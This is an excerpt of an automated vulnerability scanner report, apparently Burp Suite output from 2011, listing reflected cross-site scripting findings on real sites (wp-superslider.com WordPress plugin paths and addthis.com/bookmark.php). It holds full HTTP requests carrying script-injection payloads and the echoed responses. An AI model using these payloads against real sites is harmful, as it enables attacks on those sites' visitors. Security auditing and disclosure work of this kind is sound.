GET /site/wp-content/plugins/wp-greet-box/js/functions.js57ecd"><script>alert(1)</script>b9142a98a09 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:10 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53325
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d991d"><script>alert(1)</script>e1f4eeb27fb was submitted in the REST URL parameter 1. This input was echoed as d991d\"><script>alert(1)</script>e1f4eeb27fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sited991d"><script>alert(1)</script>e1f4eeb27fb/wp-content/plugins/wp-greet-box/js/js-mode.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:05 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dcbb"><script>alert(1)</script>2a34ec876cb was submitted in the REST URL parameter 2. This input was echoed as 9dcbb\"><script>alert(1)</script>2a34ec876cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content9dcbb"><script>alert(1)</script>2a34ec876cb/plugins/wp-greet-box/js/js-mode.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:07 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674587+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11566"><script>alert(1)</script>61a3ae9d618 was submitted in the REST URL parameter 3. This input was echoed as 11566\"><script>alert(1)</script>61a3ae9d618 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins11566"><script>alert(1)</script>61a3ae9d618/wp-greet-box/js/js-mode.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:09 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674589+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674589; expires=Thu, 02-Feb-2012 19:23:09 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:09 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55fe0"><script>alert(1)</script>4774902bb5d was submitted in the REST URL parameter 4. This input was echoed as 55fe0\"><script>alert(1)</script>4774902bb5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-greet-box55fe0"><script>alert(1)</script>4774902bb5d/js/js-mode.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:10 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a63a"><script>alert(1)</script>48ff1601d51 was submitted in the REST URL parameter 5. This input was echoed as 7a63a\"><script>alert(1)</script>48ff1601d51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-greet-box/js7a63a"><script>alert(1)</script>48ff1601d51/js-mode.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:11 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674592; expires=Thu, 02-Feb-2012 19:23:12 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:12 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9a1b"><script>alert(1)</script>9fec7095d88 was submitted in the REST URL parameter 6. This input was echoed as b9a1b\"><script>alert(1)</script>9fec7095d88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-greet-box/js/js-mode.jsb9a1b"><script>alert(1)</script>9fec7095d88 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:12 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674593+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674593; expires=Thu, 02-Feb-2012 19:23:13 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:13 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b57e"><script>alert(1)</script>980c007698c was submitted in the REST URL parameter 1. This input was echoed as 8b57e\"><script>alert(1)</script>980c007698c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site8b57e"><script>alert(1)</script>980c007698c/wp-includes/js/jquery/jquery.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:08 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674589; expires=Thu, 02-Feb-2012 19:23:09 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:09 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53278
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92397"><script>alert(1)</script>c46e27cc235 was submitted in the REST URL parameter 2. This input was echoed as 92397\"><script>alert(1)</script>c46e27cc235 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-includes92397"><script>alert(1)</script>c46e27cc235/js/jquery/jquery.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:09 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d415c"><script>alert(1)</script>2dc76faa4af was submitted in the REST URL parameter 3. This input was echoed as d415c\"><script>alert(1)</script>2dc76faa4af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-includes/jsd415c"><script>alert(1)</script>2dc76faa4af/jquery/jquery.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:11 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674591; expires=Thu, 02-Feb-2012 19:23:11 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53276
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4e83"><script>alert(1)</script>db25147c9c7 was submitted in the REST URL parameter 4. This input was echoed as d4e83\"><script>alert(1)</script>db25147c9c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-includes/js/jqueryd4e83"><script>alert(1)</script>db25147c9c7/jquery.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:12 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674592+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674593; expires=Thu, 02-Feb-2012 19:23:13 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:13 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9baba"><script>alert(1)</script>5354db22a2c was submitted in the REST URL parameter 5. This input was echoed as 9baba\"><script>alert(1)</script>5354db22a2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-includes/js/jquery/jquery.js9baba"><script>alert(1)</script>5354db22a2c HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:13 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674594+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674594; expires=Thu, 02-Feb-2012 19:23:14 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:14 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53278
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a38f0<script>alert(1)</script>9726beaea83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.phpa38f0<script>alert(1)</script>9726beaea83 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 01 Feb 2011 15:38:35 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=k78r7pgsm4fr4lff7iqm85a8p6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1523 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.phpa38f0<script>alert(1)</script>9726beaea83</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7c5"-alert(1)-"0052ce52990 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php7b7c5"-alert(1)-"0052ce52990 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 01 Feb 2011 15:38:35 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=etee9v0mo7s339efrl5f6v3n43; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1497 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php7b7c5"-alert(1)-"0052ce52990"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
1.343. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da82f"%20style%3dx%3aexpression(alert(1))%2029d0b5c18ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da82f\" style=x:expression(alert(1)) 29d0b5c18ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250&username=mc/da82f"%20style%3dx%3aexpression(alert(1))%2029d0b5c18bailus HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:42:55 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 94197
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="pub" name="pub" value="mc/da82f\" style=x:expression(alert(1)) 29d0b5c18bailus" /> ...[SNIP]...
1.344. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0096"-alert(1)-"e20af2b4cfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/c0096"-alert(1)-"e20af2b4cfa HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 15:38:33 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 93980
